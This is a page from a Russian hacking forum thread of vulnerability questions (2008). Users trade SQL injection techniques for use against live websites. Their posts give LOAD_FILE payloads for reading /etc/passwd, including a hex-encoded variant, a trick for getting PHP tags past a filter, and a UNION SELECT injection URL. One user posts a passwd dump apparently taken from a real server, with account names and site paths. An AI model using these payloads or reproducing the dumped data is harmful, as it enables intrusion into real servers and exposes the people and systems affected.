HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 177 из 2438 « Первая < 77127167 173 174 175 176 177 178 179 180 181 1872272776771177 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1761  
Старый 24.04.2008, 14:37
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу
<? phpinfo() ?>(через char())

он вырезает эти строки а точнее вырезается всё от наяала <?
 
Ответить с цитированием

  #1762  
Старый 24.04.2008, 15:38
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию
Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код
 
Ответить с цитированием

  #1763  
Старый 24.04.2008, 15:47
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл

хотя не, грузит файл
Последний раз редактировалось Doom123; 24.04.2008 в 15:54..
 
Ответить с цитированием

  #1764  
Старый 24.04.2008, 15:50
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
что можно извлеч из файла /etc/passwd ?
 
Ответить с цитированием

  #1765  
Старый 24.04.2008, 15:52
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
Цитата:
Сообщение от GOGA075  
что можно извлеч из файла /etc/passwd ?
логины пользователей
 
Ответить с цитированием

  #1766  
Старый 24.04.2008, 15:54
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию
Цитата:
например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл
Должно быть
Код:
LOAD_FILE('/etc/passwd')
или
LOAD_FILE("/etc/passwd")
или
LOAD_FILE(0x2F6574632F706173737764)
Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.
 
Ответить с цитированием

  #1767  
Старый 24.04.2008, 15:56
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
PHP код:
fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bindaemon:x:2:2:daemon:/sbinadm:x:3:4:adm:/var/admlp:x:4:7:lp:/var/spool/lpdsync:x:5:0:sync:/sbinshutdown:x:6:0:shutdown:/sbinhalt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mailnews:x:9:13:news:/var/spool/newsuucp:x:10:14:uucp:/var/spool/uucpoperator:x:11:0:operator:/rootgames:x:12:100:games:/usr/gamesgopher:x:13:30:gopher:/usr/lib/gopher-datagdm:x:42:42::/home/gdmxfs:x:43:43:X Font Server:/etc/X11/fsnobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly 
 
Ответить с цитированием

  #1768  
Старый 24.04.2008, 16:05
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию
Doom123
Цитата:
всё что начинается с <? до ?> обрезается
чисто теоретически:
<<??>? phpinfo() ?> - <??> обрежется, получится <? phpinfo() ?>
Последний раз редактировалось aka PSIH; 24.04.2008 в 16:08..
 
Ответить с цитированием

  #1769  
Старый 24.04.2008, 16:15
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
aka PSIH ты был прав) но скрипт не выполнился) вывело просто <? phpinfo()?>
 
Ответить с цитированием

  #1770  
Старый 24.04.2008, 16:25
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
кстате через иньекцию команду update можно выполнить? если да дайте плиз пример
например урла с дыркой

www.site.ru/script.php?id=-1+union+select+1,2/*
 
Ответить с цитированием
Ответ
Страница 177 из 2438 « Первая < 77127167 173 174 175 176 177 178 179 180 181 1872272776771177 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.